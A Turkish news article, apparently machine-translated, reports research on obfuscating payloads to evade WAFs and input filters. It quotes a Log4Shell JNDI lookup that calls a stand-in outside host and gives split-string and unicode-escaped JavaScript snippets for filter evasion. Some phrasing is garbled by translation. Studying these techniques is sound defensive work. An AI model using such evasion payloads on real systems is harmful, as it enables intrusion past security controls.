Tehdit aktörleri tespit sistemlerinden kaçınmak için giderek daha karmaşık yöntemler geliştirdikçe siber güvenlik manzarası gelişmeye devam ediyor.
Son araştırmalar, kötü amaçlı komut dosyalarının web uygulaması güvenlik duvarları (WAF) ve giriş doğrulama filtreleri de dahil olmak üzere modern savunma mekanizmalarını atlamasını sağlayan yük yükleme tekniklerinin kapsamlı bir analizini açıklamıştır.
Bu gelişmiş gizleme yöntemleri, siber suçlular ve güvenlik ekipleri arasındaki devam eden kedi ve fare oyununda önemli bir artışı temsil eder.
Yükü gizleme, saldırganın cephaneliğinde kritik bir araç olarak ortaya çıkmış ve kötü niyetli istismarların yürütme sırasında işlevselliklerini korurken tespit edilemez kalmasına izin vermiştir.
Teknik, kötü amaçlı kodun çeşitli kodlama yöntemleri, değişken manipülasyon ve alışılmadık sözdizimi aracılığıyla statik imzalara dayanan desen tabanlı filtreleri atlatmayı içerir.
Bu yaklaşımın, bilinen kötü niyetli kalıpları tanımaya bağlı geleneksel güvenlik önlemlerine karşı özellikle etkili olduğunu kanıtlamıştır.
Araştırma, saldırganların bu teknikleri gerçek dünya senaryolarında, özellikle 2021’de Log4shell güvenlik açığı sömürüsü sırasında nasıl başarılı bir şekilde kullandıklarını göstermektedir.
YesWehack analistleri, güvenlik duvarı satıcılarının orijinal Log4shell yükünü engellemek için kuralları hızlı bir şekilde yapılandırdıktan sonra bile, saldırganların savunmasız sistemleri tehlikeye atmaya devam eden hızla gizlenmiş varyantlar geliştirdiğini belirledi.
Orijinal yük ${jndi[:]ldap[:]//${java[:]version}.yourserver.com/a} küçük harf ikamesi, ip parçalanması ve iç içe çözünürlük teknikleri kullanılarak sofistike varyantlara dönüştürüldü.
En çok ilgili gelişmeler arasında, koruyucu mekanizmaları aynı anda çoklu kod çözme yöntemlerini işlemeye zorlayan çok katmanlı kodlama yaklaşımlarının evrimi bulunmaktadır.
Saldırganlar, gelişmiş güvenlik sistemlerine bile nüfuz edebilecek yükler oluşturmak için URL kodlama, Unicode dönüşümleri, onaltılık temsiller ve oktal kodlama birleştirme konusunda yeterlilik gösterdiler.
“%” Karakterinin “%25” olarak kodlandığı çift URL kodlama tekniklerinin, uygulamaların birden fazla turun kod çözme turu gerçekleştirdiği senaryolarda özellikle etkili olduğu kanıtlanmıştır.
Gelişmiş JavaScript Gizat ve Dinamik Yük İnşaatı
Araştırma, JavaScript ortamlarını hedefleyen, dilin çok yönlülüğünü ve DOM manipülasyon yeteneklerini kullanan özellikle sofistike gizleme tekniklerini ortaya koyuyor.
Saldırganlar, işlev çağrılarını maskelemekten kaçan Unicode’dan yararlanarak standart komutları dönüştürüyor print() gibi görünen zararsız tellere \u0070\u0072\u0069\u006e\u0074().
Bu yaklaşım, çalışma zamanı yürütülmesi sırasında tam işlevselliği korurken statik analiz araçlarından kötü niyetli niyetleri etkili bir şekilde gizler.
Değişken ifade ataması, stratejik değişken manipülasyon yoluyla dinamik yük yapımını sağlayan başka bir güçlü gizleme vektörü olarak ortaya çıkmıştır.
Tam kötü amaçlı kodu doğrudan gömmek yerine, saldırganlar yüklerini birden çok değişkene parçaladı ve yürütme sırasında yeniden yapılandırıyor.
Örneğin, JavaScript komutu alert(1) Gizlenebilir a="al";b="ert";c="(1";d=")";eval(a+b+c+d);tespiti geleneksel imza tabanlı güvenlik sistemleri için önemli ölçüde daha zorlaştırır.
Dizi tabanlı parametre manipülasyonu, özellikle HTTP parametrelerinin diziler olarak işlenebileceği PHP ortamlarında eşit derecede ilgili bir gelişimi temsil eder.
Saldırganlar, Sunucu tarafı işleme ile eklenen sınırlayıcı karakterleri işlemek için yorum sözdizimi kullanarak SQL enjeksiyon yüklerini birden çok dizi öğesine bölmek için bu işlevselliği kullanır.
Bu teknik, yürütme sırasında kötü amaçlı sorguları yeniden yapılandırırken giriş doğrulamasını etkili bir şekilde atlar.
Bu gelişmiş gizleme tekniklerinin sonuçları, bireysel saldırı senaryolarının çok ötesine uzanır, mevcut güvenlik paradigmalarına temel olarak meydan okur ve gerçek zamanlı ortamlarda çok katmanlı ombez yükleri etkili bir şekilde analiz edip kod çözebilen daha karmaşık savunma stratejileri gerektirir.
SOC’nizi en son tehdit verilerine tam erişimle donatın Herhangi biri. Olay yanıtı iyileştirebilir -> 14 günlük ücretsiz deneme alın